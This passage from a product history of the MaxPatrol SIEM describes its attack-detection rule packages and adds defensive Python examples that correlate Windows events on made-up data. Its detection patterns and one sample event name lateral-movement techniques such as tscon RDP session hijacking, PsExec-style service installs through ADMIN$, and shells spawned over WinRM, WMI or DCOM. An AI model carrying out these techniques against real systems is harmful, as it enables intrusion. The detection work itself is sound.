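              key_fields: Tuple[str, ...] = ("rule", "account"),
              window: timedelta = timedelta(minutes=10)) -> List[Incident]:
    """Fold alerts into incidents. An alert joins the open incident with the same
    key if it arrives within `window` of that incident's last alert; otherwise a
    new incident is opened, so a quiet gap longer than `window` splits bursts."""
    open_by_key: Dict[Tuple, Incident] = {}
    incidents: List[Incident] = []
    for a in sorted(alerts, key=lambda x: x.ts):
        key = tuple(getattr(a, f) for f in key_fields)
        inc = open_by_key.get(key)
        if inc is None or a.ts - inc.last_seen > window:
            inc = Incident(rule=a.rule, account=a.account, first_seen=a.ts, last_seen=a.ts)
            incidents.append(inc)
            open_by_key[key] = inc
        inc.alerts.append(a)
        inc.last_seen = a.ts
        inc.sources.add(a.src_ip)
    return incidents


if __name__ == "__main__":
    for inc in aggregate(SAMPLE_ALERTS):
        print(f"{inc.rule} on {inc.account}: {len(inc.alerts)} alerts, "
              f"{inc.first_seen:%H:%M:%S}-{inc.last_seen:%H:%M:%S}, sources={sorted(inc.sources)}")
```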

To analyze and process information security events from different systems, events must be brought to a single format. For this, SIEM systems use normalization formulas. Previously, MaxPatrol SIEM users saw only events already reduced to a single format. With the updated version, they can view the "raw" events before they normalize. This is important because systems connected to SIEM are regularly updated, which can affect the format of the transmitted data. Analysis of "raw" events will help MaxPatrol SIEM users identify errors and take them into account in normalization formulas in order to obtain all the necessary data to identify incidents in full, according to Positive Technologies.

To upgrade to MaxPatrol SIEM 5.1, contact Positive Technologies partners or technical support.

Loading the detection package of 15 popular reconnaissance techniques

Users of the MaxPatrol SIEM system can now identify attackers at the stage when they collect data on a compromised network in order to develop their attack. This was announced on January 28, 2020 by Positive Technologies. To do this, an expertise package with rules for detecting attacks carried out using the Discovery tactic of the MITRE ATT&CK model has been loaded into MaxPatrol SIEM.[1]

After gaining permanent access to the victim's network, attackers need to determine where in the infrastructure they are, what surrounds them and what they can control. During reconnaissance, attackers collect data on a compromised system and internal network, and this helps them navigate to decide how to proceed. To do this, attackers often use the built-in tools of operating systems.

Updated Examination Package [2] includes detection rules for 15 popular reconnaissance techniques. Now users will be able to detect the activity of cybercriminals even during their attempts to obtain a list of domain accounts, password policy information, a list of installed applications and services, and information about the status of protection tools.

File:Aquote1.png
It is not easy to distinguish the activity of attackers who conduct reconnaissance from the legitimate requests of ordinary users. If attackers act under a real user account and use built-in utilities, then their activity is usually lost in the event stream. This examination package will help draw the attention of information security specialists to events that, at first glance, may not arouse suspicion,
comments Anton Tyurin, Head of Expert Services at PT Expert Security Center
File:Aquote2.png

The Discovery tactic examination package is the fifth package with attack detection rules based on the MITRE ATT&CK model; a total of 12 tactics are described in the ATT&CK matrix. Packages previously loaded into MaxPatrol SIEM continue to be replenished with rules as attack detection methods appear.[3] So, simultaneously with the release of the fifth examination package, the first package in the series received 14 correlation rules to identify code execution and protection bypass techniques.

2019

Loading an Expert Review Package to Detect Attacks on Linux Operating Systems

On November 26, 2019, Positive Technologies announced that an expertise package was loaded into the MaxPatrol SIEM incident detection system to identify attacks on Linux operating systems. It helps detect suspicious network activity of applications and accounts, which will prevent the development of an attack.

Linux is a popular operating system in the markets of cloud services, supercomputers, and web servers. According to a study by W3Techs, Linux supports 70% of websites out of the most popular 10 million domains by Alexa rating. Such servers can become a point of penetration of attackers into the organization's network if there are vulnerabilities in the web applications deployed on them. To help companies with Linux infrastructure ensure its security, Positive Technologies experts have developed ways to detect popular threats.

Linux systems often act as Internet servers, including in large organizations. This explains the interest of cybercriminals in them: hacking Linux on the perimeter often leads the attacker to the internal network of the enterprise. Moreover, the standard tools of a typical Linux system are very convenient for the further development of the attack. To thwart attackers, we developed a series of detection rules for MaxPatrol SIEM,
comments Mikhail Pomzov, Director of the Knowledge Base and Expertise Department of Positive Technologies

The added examination package combines rules aimed at detecting suspicious actions on IT assets running the Linux operating system. They identify the use of several techniques from the MITRE ATT&CK matrix that attackers use for persistence, discovery and command-and-control communication. So, the rules find:

  • the launch of web shell, reverse shell and bind shell remote connection tools, which attackers use to control the target system during the persistence stage;
  • the activity of utilities on behalf of service accounts, which attackers can use to obtain information about a compromised node and its network environment during the reconnaissance stage;
  • system calls specific to creating tunneled connections (attackers need them to create a communication channel with a compromised node).

The following examination packages for Linux will be released in 2020 and will identify attackers by suspicious changes in system objects and user actions.

Release of an expert review package to identify attacks on the SAP ERP enterprise management system

On October 28, 2019, Positive Technologies released the MaxPatrol SIEM expertise package designed to identify attacks on the SAP ERP enterprise management system. The rules included in it will help detect suspicious user activity in the system. This will detect the presence of an attacker in SAP ERP before he steals critical business data or money.

MaxPatrol SIEM
Since ERP systems are always an object of increased interest for cybercriminals, we have formed an expert team that specializes in investigating business system vulnerabilities and developing ways to detect threats in them. The specialists of this group are deeply immersed in the architecture of all popular business systems, including SAP ERP, they know how attackers "break" such systems, track changes in hacking scenarios and the emergence of new tools. Based on this knowledge, they create specialized examination packages,
comments Mikhail Pomzov, Director of the Knowledge Base and Expertise Department of Positive Technologies

The package includes 13 rules for correlation of information security events. They allow you to identify the activity of attackers in SAP ERP, which looks like legitimate actions of users, but in fact allows attackers to disguise themselves as much as possible in the system, elevate account privileges, gain administrator rights or access to confidential information. Among such actions:

  • using a temporarily unlocked account to log into SAP,
  • a user or administrator assigning privileges to themselves,
  • copying confidential information from reports or tables,
  • issuing a report with confidential information,
  • logging on to SAP under the account of a dismissed employee,
  • downloading a large amount of data from a report or table.

Simultaneously with the release of the next examination package, the previous package of rules for detecting attacks on SAP ERP was replenished with another 12 detection rules. They will help identify the following threats:

  • a denial-of-service attack;
  • collection by attackers of information about registered programs, system vulnerabilities and allowed commands;
  • attempts to register malicious programs;
  • execution of OS commands by an attacker without authorization in the system;
  • disabling event logging (makes it impossible to detect the attacker's activity);
  • redirecting traffic intended for the SAP server to a fake server.

In MaxPatrol SIEM, you can configure rules based on system classes in SAP ERP to reduce false positives. For example, it is recommended that you activate the rule for notification of the use of a temporarily unlocked account for SAP login for test class and production class systems and not use it for development class systems.

Since February 2019, MaxPatrol SIEM users have already received eight examination packages that allow you to quickly identify brute force attempts, anomalies in user activity, attacks on critical business systems, and the use of tactics by attackers using the MITRE ATT&CK model.

Loading an Expert Review Package to Detect Attacks on Oracle Database

On September 5, 2019, Positive Technologies announced that another examination package has been loaded into MaxPatrol SIEM.[4] Its information security event correlation rules identify suspicious activity in Oracle database management systems. This will help users quickly localize attacks, preventing data breaches or DBMS outages.

According to the analytical company Gartner, Oracle is the leader in the global database management systems market. DBMSs, as a rule, store the personal data of employees and customers, financial and payment information and intellectual property; all of this may be of interest to intruders. In its analysis of current cyber threats for the second quarter of 2019, Positive Technologies notes that more than half of all cybercrimes during this period were committed precisely with the aim of stealing information. At the same time, the five most frequently stolen types of data were personal data, credentials, payment card data, commercial secrets and medical information. They accounted for 88% of all stolen data.

The purpose of an attacker's attack on a DBMS can be not only access to confidential data, but also disabling the system in order to hide their actions or simply cause damage. Since the DBMS is often connected to many other systems, a failure of its health can lead to a complete shutdown of the entire business process. Therefore, it is critical to protect your databases,
comments Anton Stolyarov, Head of Database Security at Positive Technologies

To prevent data leaks and Oracle Database outages, the R&D Positive Technologies team created a special examination package with 13 correlation rules. With their help, MaxPatrol SIEM users can identify the following suspicious actions, each of which requires investigation:

  • determining the DBMS version (the first action of an attacker in an attack on the system);
  • selecting the database name (clearly indicates the beginning of an attack on the DBMS);
  • modifying, deleting or adding audit table entries (an attempt by the attacker to deceive or lead the investigation down a false trail);
  • operations on auditing: disabling or removing the audit, its system rules or its fine-grained audit policy;
  • actions of a privileged user (SYSDBA);
  • reading tables containing passwords.

MaxPatrol SIEM 5.0

On July 29, 2019, Positive Technologies announced an update to the MaxPatrol SIEM incident detection system. Version 5.0 allows retrospective analysis and monitoring of information security in distributed infrastructures. The product also has builders for correlation rules and reports, and a number of improvements that simplify the work of the system operator.

Builder for creating new correlation rules in a few clicks in MaxPatrol SIEM 5.0

According to the developer, one of the key changes is the correlation rule builder: the MaxPatrol SIEM user can create their own rules in several clicks without using any special programming language. The builder uses macros to quickly substitute frequently used or hard-to-write fragments of program code. The set of pre-installed macros is regularly replenished and can be expanded by the user.

The system has the opportunity to conduct retrospective analysis on indicators of compromise. With it, MaxPatrol SIEM will help detect an attack that occurred in the past and prevent its further development. The product contains a daily replenished database of Positive Technologies indicators, and also supports compromise indicators developed by Kaspersky Lab and Group-IB. The user of the system must once activate the function of checking information security events using compromise indicators, and then MaxPatrol SIEM automatically launches a retrospective analysis every time the indicator base is replenished, Positive Technologies emphasized.

Monitoring capabilities have expanded for companies with a large hierarchical infrastructure: you can receive up-to-date data on the state of information security throughout the organization at any time and identify distributed attacks on the infrastructure of an individual unit or entire enterprise. The system toolkit allows you to visualize the architecture and hierarchy of deployed MaxPatrol SIEM configurations and configure transparent rules for the exchange of information between them, according to Positive Technologies.

Toolbar for transferring data from subpartitions to the parent organization in MaxPatrol SIEM 5.0

According to the developer's statement, in the presented version of MaxPatrol SIEM, users will be able to generate their own reports with data on assets, events and incidents at the selected time interval (while the storage period recommended by the system manufacturer is three months, in archives - up to six months). The information is loaded into the report in the form of widgets (standard and custom widgets are available). The structure and appearance of the report are configured in a convenient designer with a familiar interface similar to Microsoft Word.

As noted by Positive Technologies, other improvements have been made to the convenience of working with the product. Data visualization options have expanded: additional diagrams and a tabular form of presenting information on dashboards have appeared. The most common operator scenarios have been simplified: for example, in the presented version the user can create tasks for collecting events and scanning assets by copying existing ones, which made it possible to reduce the time to implement SIEM in a large infrastructure by almost half. Another addition: the ability to compare the states of an asset whose information was collected at different points in time, or to view all successive changes in its state between these moments. This will reduce labor costs when investigating incidents or analyzing the reasons for a change in the level of security, as well as reduce the number of tools required for this.

"MaxPatrol SIEM is already a mature product. Therefore, we focused on simplifying processes that were previously complex and took a long time. This task, for example, is handled by the constructors of correlation rules and reports that appeared in the updated version."

Loading the examination package to detect the horizontal movement of attackers in the infrastructure

On July 16, 2019, Positive Technologies announced that a second examination package identifying attacks that use one of the MITRE ATT&CK model tactics against the Windows operating system had been loaded into MaxPatrol SIEM. Thanks to this, MaxPatrol SIEM users can detect not only attacker activity using the "Execution" and "Bypass protection" tactics, but also the "Horizontal movement" (Lateral Movement) tactic. This allows detecting attempts by attackers to expand their presence on the network before they gain control over the infrastructure.

Attackers use lateral movement techniques to gain access to and control remote systems on the network, install malware, and gradually expand their presence in the infrastructure. Their main goal is to identify administrators on the network, their computers, key assets and data, in order to ultimately gain full control over the infrastructure. The expertise package includes 18 correlation rules that help identify the most relevant techniques, the developer noted.

"It is critical to detect attacker activity during the initial stages of lateral movement. If the attacker takes over administrative privileges, he will be able to access any accounts and servers and thus quickly expand his presence to control the infrastructure. For MaxPatrol SIEM users, we have developed a set of rules that identify the most common attacker steps," noted Anton Tyurin, Head of Expert Services at PT Expert Security Center.

According to the developer, the expertise package loaded into MaxPatrol SIEM identifies the following attacker actions as part of lateral movement:

  • Illegitimate connections to systems via the Remote Desktop Protocol (RDP).
  • Attempts to hijack a user's RDP session.
  • Use of administrator-level accounts to remotely access systems via the Server Message Block (SMB) protocol in order to transfer and run files.
  • Remote copying of files to the victim's system to deploy hacker tools and execute them remotely.
  • Use of Distributed Component Object Model (DCOM) software components, with which attackers acting on behalf of a user with sufficient privileges can execute commands remotely.
  • Use of the Windows Remote Management (WinRM) administration mechanism to work with remote systems, for example to run an executable file, modify the registry, or manage Windows applications.
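As an added illustration of what correlation checks for these indicators look like in practice (this is example code written for this page, not MaxPatrol SIEM's own rules, and the event records are constructed), the script below walks a list of normalized Windows Security and System log events and raises a finding for each of the listed actions: an RDP logon (event 4624, logon type 10) from a source that is not a known jump host, access to an SMB administrative share (event 5140), a shell spawned by the WinRM, WMI or DCOM host process (event 4688 with `ParentProcessName`, which requires Windows 8.1/2012 R2 or later), an RDP session hijack attempt via `tscon.exe`, and a PsExec-style service installed from a UNC path or user-writable directory (event 7045). The field names follow the Windows event XML; the jump-host whitelist is an assumed tuning parameter.

```python
"""Added example: simple correlation checks for lateral-movement indicators over
constructed Windows event records. Not MaxPatrol SIEM rule code."""

# Windows event IDs used as signals.
EID_LOGON = 4624            # Security: successful logon (LogonType 10 = RDP, 3 = network)
EID_SHARE_ACCESS = 5140     # Security: a network share object was accessed (File Share auditing)
EID_PROCESS_CREATE = 4688   # Security: new process created (ParentProcessName on Win 8.1/2012 R2+)
EID_SERVICE_INSTALL = 7045  # System: a service was installed (PsExec-style remote execution)

LOGON_TYPE_RDP = 10
ADMIN_SHARES = {r"\\*\ADMIN$", r"\\*\C$"}          # shares used to drop and run tools over SMB
# Host processes of remote execution: WinRM (wsmprovhost), WMI (wmiprvse), DCOM (dllhost).
REMOTE_EXEC_HOSTS = {"wsmprovhost.exe", "wmiprvse.exe", "dllhost.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "rundll32.exe", "mshta.exe"}


def basename(path):
    """'C:\\Windows\\System32\\cmd.exe' -> 'cmd.exe' (case-folded)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_lateral_movement(events, rdp_jump_hosts=frozenset()):
    """Return (rule, computer, detail) tuples for every event that matches a check.
    `rdp_jump_hosts` is an assumed whitelist of IPs allowed to open RDP sessions."""
    alerts = []
    for e in events:
        eid, host = e["EventID"], e["Computer"]
        if eid == EID_LOGON and e.get("LogonType") == LOGON_TYPE_RDP \
                and e.get("IpAddress") not in rdp_jump_hosts:
            alerts.append(("rdp_logon_from_unexpected_source", host,
                           f"{e['TargetUserName']} from {e['IpAddress']}"))
        elif eid == EID_SHARE_ACCESS and e.get("ShareName") in ADMIN_SHARES:
            alerts.append(("admin_share_access", host,
                           f"{e['SubjectUserName']} -> {e['ShareName']} from {e['IpAddress']}"))
        elif eid == EID_PROCESS_CREATE:
            parent = basename(e.get("ParentProcessName", ""))
            child = basename(e.get("NewProcessName", ""))
            if child == "tscon.exe":
                # tscon attaches another user's disconnected RDP session to the
                # current one without a password when run as SYSTEM.
                alerts.append(("rdp_session_hijack_attempt", host, e.get("CommandLine", "")))
            elif parent in REMOTE_EXEC_HOSTS and child in SHELLS:
                alerts.append(("remote_exec_shell", host, f"{parent} spawned {child}"))
        elif eid == EID_SERVICE_INSTALL:
            image = e.get("ImagePath", "").lower()
            # A service binary on a UNC path or in a user-writable directory is
            # typical of tool deployment through ADMIN$ followed by remote execution.
            if image.startswith("\\\\") or "\\temp\\" in image or "\\users\\" in image:
                alerts.append(("suspicious_service_install", host,
                               f"{e.get('ServiceName')} -> {e.get('ImagePath')}"))
    return alerts


# Constructed sample stream (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4624, "Computer": "FS01", "LogonType": 10, "TargetUserName": "j.doe", "IpAddress": "10.0.5.23"},
    {"EventID": 4624, "Computer": "FS01", "LogonType": 10, "TargetUserName": "admin", "IpAddress": "10.0.0.10"},
    {"EventID": 5140, "Computer": "WS07", "SubjectUserName": "svc_backup", "ShareName": r"\\*\ADMIN$", "IpAddress": "10.0.5.23"},
    {"EventID": 5140, "Computer": "WS07", "SubjectUserName": "j.doe", "ShareName": r"\\*\Public", "IpAddress": "10.0.5.40"},
    {"EventID": 4688, "Computer": "WS07", "ParentProcessName": r"C:\Windows\System32\wsmprovhost.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 4688, "Computer": "FS01", "ParentProcessName": r"C:\Windows\System32\services.exe",
     "NewProcessName": r"C:\Windows\System32\tscon.exe", "CommandLine": "tscon.exe 2 /dest:rdp-tcp#1"},
    {"EventID": 7045, "Computer": "WS07", "ServiceName": "PSEXESVC", "ImagePath": r"\\WS07\ADMIN$\PSEXESVC.exe"},
    {"EventID": 7045, "Computer": "WS07", "ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
]

if __name__ == "__main__":
    for rule, computer, detail in detect_lateral_movement(SAMPLE_EVENTS, rdp_jump_hosts={"10.0.0.10"}):
        print(f"[{rule}] {computer}: {detail}")
```

With the jump host 10.0.0.10 whitelisted, the sample stream yields five findings; without the whitelist the second RDP logon is reported too. Real rules would additionally correlate the share access, the service install and the shell spawn by source address and time window, which is what turns single signals into an incident.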

In addition, the package includes rules that identify attacker techniques belonging to the Execution tactic of the ATT&CK matrix. The investigation practice of the PT Expert Security Center team shows that such techniques are also used for lateral movement: for example, remote creation of scheduled tasks, use of the WinExec administration utility to execute commands and expand presence, use of Windows Management Instrumentation (WMI) to manage and access remote systems, and attempts to access file shares on remote systems.

As noted by Positive Technologies, this is the second expertise package in a special series, created with the participation of the PT Expert Security Center team, intended to cover all 12 tactics of the MITRE ATT&CK matrix. Each package in the series is aimed at detecting attacks that use one or more tactics.

The expertise packages loaded into MaxPatrol SIEM are supplemented with rules as new attack techniques, tactics and procedures emerge. Thus, simultaneously with the release of the lateral movement package, the first package in the series was supplemented with two correlation rules, the developer emphasized.

Loading the expertise package for detecting attacks using the MITRE ATT&CK model in Windows

On June 4, 2019, it became known that an updated expertise package had been uploaded to MaxPatrol SIEM: the information security event correlation rules in it are aimed at detecting attacker activity that uses the Execution and Defense Evasion tactics of the MITRE ATT&CK model for the Windows operating system. MaxPatrol SIEM users can now detect active actions of an attacker after penetration of the IT infrastructure.

MITRE ATT&CK is a knowledge base describing attacker tactics, techniques and procedures. Specialists of the Positive Technologies Expert Security Center (PT Expert Security Center) are creating a special series of expertise packages for MaxPatrol SIEM, each of which detects attacks that use one or more tactics according to the ATT&CK for Enterprise matrix. PT Expert Security Center plans to gradually cover all 12 tactics of the matrix.

The first package in the series includes 15 information security event correlation rules that help identify the most relevant attack techniques of the Execution and Defense Evasion tactics. The Execution tactic covers techniques attackers use to run code on compromised systems; among other things, they are used for lateral movement to extend access to remote systems on the network. The Defense Evasion tactic combines techniques with which an attacker hides malicious activity and avoids detection by security tools.

"Classic SIEM systems are not able to detect attacks that use zero-day exploits, so it is more expedient to 'catch' them at subsequent stages of the attack. The classic step of attackers is to execute malicious code and try to bypass the means of protection in order to successfully achieve their goals. Therefore, first of all, we have prepared an expertise package covering the Execution and Defense Evasion tactics of the MITRE ATT&CK model. As a rule, these tactics are used during the stages of intruder penetration into the infrastructure," comments Alexey Novikov, director of the Positive Technologies Expert Security Center (PT Expert Security Center).

Among other things, the correlation rules identify techniques that follow the living off the land (LOTL) approach, in which attackers use legitimate tools already present on the attacked system. This approach is increasingly used by APT groups; for example, the Cobalt Group and MuddyWater groups used the built-in Windows Connection Manager Profile Installer utility (cmstp.exe) to run malicious software. LOTL allows attackers to act under the guise of legitimate system administration, which reduces the likelihood that traditional security tools will detect, and therefore block, the attack.

By the end of 2019, expertise packages for detecting the Initial Access, Persistence, Credential Access and Lateral Movement tactics will be loaded into MaxPatrol SIEM. All expertise packages will be supplemented with rules as new attack techniques, tactics and procedures are discovered.

Loading an expertise package for detecting anomalies in user activity in Microsoft Active Directory

On April 10, 2019, Positive Technologies announced the loading into MaxPatrol SIEM of an expertise package that detects anomalies in user activity in Microsoft Active Directory. Such activity within the network may indicate a developing attack on the organization's IT infrastructure, which can lead to unlimited control over the accounts and computers on the local network.


The correlation rules in the expertise package identify attacker actions by profiling user activity. For each account and network node in the infrastructure, a behavior model is built automatically from the history of legitimate actions. When a user performs an action that deviates from the model, MaxPatrol SIEM registers an anomaly.

As of April 2019, three scenarios had been implemented:

  • logon to Windows,
  • access to shared network resources and named pipes,
  • requests for session tickets for Kerberos authentication.

If any of the above actions is carried out successfully on behalf of an account or network node that has not performed such actions for a long time, the MaxPatrol SIEM operator receives an information security incident notification describing the type and key attributes of the anomaly.
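To make the profiling logic of the three scenarios concrete, here is an added example (written for this page, not MaxPatrol SIEM's own profiling engine) that builds a per-account and per-client baseline from a constructed history of Windows logon (4624), share access (5140) and Kerberos service ticket (4769) events, then flags successful actions whose account-to-target or client-to-target pair is either absent from the baseline or was last seen longer than an assumed 90-day threshold ago. The `Status` field is assumed to be added at normalization, with `0x0` meaning success; all records are made up.

```python
"""Added example: behaviour baseline per account and per client host for the
logon / share access / Kerberos TGS scenarios. Constructed events, not real telemetry."""
from collections import defaultdict
from datetime import datetime, timedelta

# Event IDs feeding the three profiled scenarios (real Windows Security log IDs).
SCENARIOS = {
    4624: "logon",          # account logged on
    5140: "share_access",   # network share or named pipe (\\*\IPC$) accessed
    4769: "kerberos_tgs",   # Kerberos service ticket (TGS) requested
}


def parse_time(s):
    return datetime.fromisoformat(s)


def subject_of(e):
    """Acting account and the client address it came from."""
    return e.get("TargetUserName") or e.get("SubjectUserName"), e.get("IpAddress")


def target_of(e):
    """What was acted on: a host, a share on a host, or a service principal."""
    scenario = SCENARIOS[e["EventID"]]
    if scenario == "kerberos_tgs":
        return e["ServiceName"]
    if scenario == "share_access":
        return f"{e['Computer']}:{e['ShareName']}"
    return e["Computer"]


def build_baseline(history):
    """Profiles from legitimate history: for each (scenario, account) and
    (scenario, client IP), the targets touched and when each was last seen."""
    by_account, by_host = defaultdict(dict), defaultdict(dict)
    for e in history:
        if e["EventID"] not in SCENARIOS:
            continue
        scenario, (account, ip), target, ts = SCENARIOS[e["EventID"]], subject_of(e), target_of(e), e["Time"]
        for profiles, who in ((by_account, account), (by_host, ip)):
            seen = profiles[(scenario, who)]
            seen[target] = max(seen.get(target, ts), ts)
    return by_account, by_host


def detect_anomalies(events, baseline, stale_after=timedelta(days=90)):
    """Flag successful actions whose (account, target) or (client, target) pair is
    absent from the baseline or was last seen more than `stale_after` ago."""
    by_account, by_host = baseline
    findings = []
    for e in events:
        if e["EventID"] not in SCENARIOS or e.get("Status", "0x0") != "0x0":
            continue  # only successful actions count, as in the scenarios above
        scenario, (account, ip), target, ts = SCENARIOS[e["EventID"]], subject_of(e), target_of(e), e["Time"]
        for kind, profiles, who in (("account", by_account, account), ("host", by_host, ip)):
            last = profiles.get((scenario, who), {}).get(target)
            if last is None:
                findings.append((scenario, kind, who, target, "never seen"))
            elif ts - last > stale_after:
                findings.append((scenario, kind, who, target, f"last seen {(ts - last).days} days ago"))
    return findings


# Constructed legitimate history used to train the profiles.
HISTORY = [
    {"EventID": 4624, "Time": parse_time("2019-03-01T09:00"), "TargetUserName": "j.doe", "IpAddress": "10.0.5.23", "Computer": "WS07"},
    {"EventID": 4624, "Time": parse_time("2019-03-15T09:02"), "TargetUserName": "j.doe", "IpAddress": "10.0.5.23", "Computer": "WS07"},
    {"EventID": 5140, "Time": parse_time("2019-03-15T09:05"), "SubjectUserName": "j.doe", "IpAddress": "10.0.5.23", "Computer": "FS01", "ShareName": r"\\*\IPC$"},
    {"EventID": 4769, "Time": parse_time("2019-03-15T09:05"), "TargetUserName": "j.doe@CORP.LOCAL", "IpAddress": "10.0.5.23", "ServiceName": "FS01$"},
    {"EventID": 4624, "Time": parse_time("2018-11-20T08:00"), "TargetUserName": "svc_legacy", "IpAddress": "10.0.9.9", "Computer": "FS01"},
]

# Constructed new events to score against the profiles.
NEW_EVENTS = [
    {"EventID": 4624, "Time": parse_time("2019-04-10T11:00"), "TargetUserName": "j.doe", "IpAddress": "10.0.5.23", "Computer": "WS07", "Status": "0x0"},
    {"EventID": 4624, "Time": parse_time("2019-04-10T11:10"), "TargetUserName": "j.doe", "IpAddress": "10.0.5.23", "Computer": "DC01", "Status": "0x0"},
    {"EventID": 4769, "Time": parse_time("2019-04-10T11:11"), "TargetUserName": "j.doe@CORP.LOCAL", "IpAddress": "10.0.5.23", "ServiceName": "DC01$", "Status": "0x0"},
    {"EventID": 4769, "Time": parse_time("2019-04-10T11:12"), "TargetUserName": "j.doe@CORP.LOCAL", "IpAddress": "10.0.5.23", "ServiceName": "FS01$", "Status": "0x0"},
    {"EventID": 4769, "Time": parse_time("2019-04-10T11:13"), "TargetUserName": "j.doe@CORP.LOCAL", "IpAddress": "10.0.5.23", "ServiceName": "SQL01$", "Status": "0x12"},
    {"EventID": 4624, "Time": parse_time("2019-04-10T12:00"), "TargetUserName": "svc_legacy", "IpAddress": "10.0.9.9", "Computer": "FS01", "Status": "0x0"},
]

if __name__ == "__main__":
    for finding in detect_anomalies(NEW_EVENTS, build_baseline(HISTORY)):
        print(finding)
```

On the sample data the routine logon and the usual FS01 ticket request stay silent, the failed ticket request is ignored, while the first logon to DC01, the first ticket for DC01$ and the dormant service account waking up after 141 days each produce one finding per profile (account and client host). A production implementation would keep the profiles incrementally rather than rebuilding them, and the staleness threshold is a tuning decision.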

Positive Technologies experts plan to gradually expand the set of correlation rules for detecting anomalous activity in the infrastructure. Within a month, a rule will be added to detect suspicious processes running on a host under an account with maximum privileges on the system.

Improving the accuracy of brute-force detection

On March 1, 2019, Positive Technologies announced that another expertise package had been loaded into the MaxPatrol SIEM incident detection system, making it possible to identify attempts to hack accounts by guessing the login and password (brute force) more effectively. The correlation rules in the package improved the accuracy of detecting brute-force incidents and reduced the system's memory consumption by 20%.

Positive Technologies specialists revised their approach to brute-force detection. As a result, rules were written that help MaxPatrol SIEM users identify hacking attempts using a minimum of information: data on authentication attempts, the sources and targets of the brute force, and features of the infrastructure.

If an attack against a specific target or from a specific source is prolonged, MaxPatrol SIEM creates one incident per day (the frequency can be changed) and stores in that incident statistics on all credential-guessing attempts associated with the participants of the attack. This reduces the number of notifications and greatly simplifies and speeds up incident analysis.

With this expertise package it became possible to create whitelists of network nodes and users that enumerate logins and passwords for legitimate purposes, and to automatically suppress rule triggering for incidents involving them. These may include, for example, vulnerability scanner nodes, shared accounts, and network nodes in the DMZ.

The rules were optimized to distribute load more evenly between MaxPatrol SIEM components and were tested on a stream of 30,000 events per second. As a result, memory consumption is 20% lower than when the same event stream is processed by the previous correlation rules.
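The three properties described above (a threshold on failed authentications per source and target, one aggregated incident per period that accumulates statistics instead of an alert per attempt, and a whitelist of nodes and accounts that legitimately enumerate credentials) can be seen together in the added example below. It is illustrative code written for this page, not MaxPatrol SIEM's rule implementation; the events, the 10-failures-in-5-minutes threshold and the one-day incident period are constructed and are tuning assumptions. It also records a success that follows a burst of failures, which is the signal that the guessing worked.

```python
"""Added example: brute-force detection with daily incident aggregation and whitelists.
Constructed events; thresholds are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta


def parse_time(s):
    return datetime.fromisoformat(s)


class BruteForceDetector:
    """Counts failed authentications per (source, target host) in a sliding window;
    once the threshold is hit, opens one incident per `incident_period` for that pair
    and keeps statistics in it instead of raising an alert per attempt."""

    def __init__(self, threshold=10, window=timedelta(minutes=5),
                 incident_period=timedelta(days=1),
                 whitelist_ips=frozenset(), whitelist_users=frozenset()):
        self.threshold, self.window, self.period = threshold, window, incident_period
        self.whitelist_ips, self.whitelist_users = set(whitelist_ips), set(whitelist_users)
        self._recent = defaultdict(list)   # (src, dst) -> [(time, user), ...] failures in window
        self.incidents = {}                # (src, dst, period_start) -> statistics

    def _period_start(self, ts):
        return ts - ((ts - datetime.min) % self.period)   # midnight for a one-day period

    def feed(self, e):
        """Consume one normalized auth event. Returns the key of the incident the
        event was folded into, or None if it contributed to no incident."""
        src, dst, user, ts, ok = e["src_ip"], e["dst_host"], e["user"], e["time"], e["success"]
        if src in self.whitelist_ips or user in self.whitelist_users:
            return None                   # scanners, shared accounts, DMZ nodes: suppressed
        inc_key = (src, dst, self._period_start(ts))
        inc = self.incidents.get(inc_key)
        if ok:
            if inc is None:
                return None
            inc["succeeded_as"].append(user)   # success after a burst: credentials likely guessed
            inc["last"] = ts
            return inc_key
        recent = self._recent[(src, dst)]
        recent.append((ts, user))
        while ts - recent[0][0] > self.window:     # slide the window forward
            recent.pop(0)
        if inc is None:
            if len(recent) < self.threshold:
                return None
            inc = self.incidents[inc_key] = {"first": recent[0][0], "last": ts, "failed": 0,
                                             "users": set(), "succeeded_as": []}
            for _, u in recent:           # fold in the failures that crossed the threshold
                inc["failed"] += 1
                inc["users"].add(u)
            return inc_key
        inc["failed"] += 1
        inc["users"].add(user)
        inc["last"] = ts
        return inc_key


def run_sample():
    """Feed a constructed event stream and return the detector for inspection."""
    det = BruteForceDetector(threshold=10, whitelist_ips={"10.0.0.50"}, whitelist_users={"scan_svc"})
    base = parse_time("2019-03-01T10:00:00")
    events = []
    for i in range(25):                   # attacker cycling three accounts, 10 s apart
        events.append({"time": base + timedelta(seconds=10 * i), "src_ip": "10.0.5.23", "dst_host": "FS01",
                       "user": ["alice", "bob", "carol"][i % 3], "success": False})
    events.append({"time": base + timedelta(seconds=260), "src_ip": "10.0.5.23", "dst_host": "FS01",
                   "user": "carol", "success": True})          # the guess that worked
    for i in range(50):                   # vulnerability scanner, whitelisted by IP and account
        events.append({"time": base + timedelta(seconds=i), "src_ip": "10.0.0.50", "dst_host": "FS01",
                       "user": "scan_svc", "success": False})
    for i in range(2):                    # a user who mistyped a password twice
        events.append({"time": base + timedelta(seconds=i), "src_ip": "10.0.7.7", "dst_host": "FS01",
                       "user": "dave", "success": False})
    for i in range(12):                   # same attacker the next day: a separate daily incident
        events.append({"time": parse_time("2019-03-02T00:01:00") + timedelta(seconds=i), "src_ip": "10.0.5.23",
                       "dst_host": "FS01", "user": "alice", "success": False})
    for e in sorted(events, key=lambda x: x["time"]):
        det.feed(e)
    return det


if __name__ == "__main__":
    for key, inc in sorted(run_sample().incidents.items()):
        print(key, inc["failed"], "failures,", sorted(inc["users"]), "succeeded as", inc["succeeded_as"])
```

The 25 failures from 10.0.5.23 become a single incident for March 1 with all three targeted accounts and the later success recorded in it, the next day's burst opens a second incident, and neither the whitelisted scanner nor the two mistyped passwords produce anything. Keeping per-pair state bounded (the window list never holds more than one window's worth of failures) is what keeps memory flat on a high event rate.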

2018

MaxPatrol SIEM is certified for use in the Republic of Belarus

On June 21, 2018, it became known that the MaxPatrol SIEM information security event monitoring and incident detection system had successfully passed tests for compliance with the requirements of the technical regulation of the Republic of Belarus "Information Technologies. Information Security Tools. Information Security" (TR 2013/027/BY) as a mass-produced product.

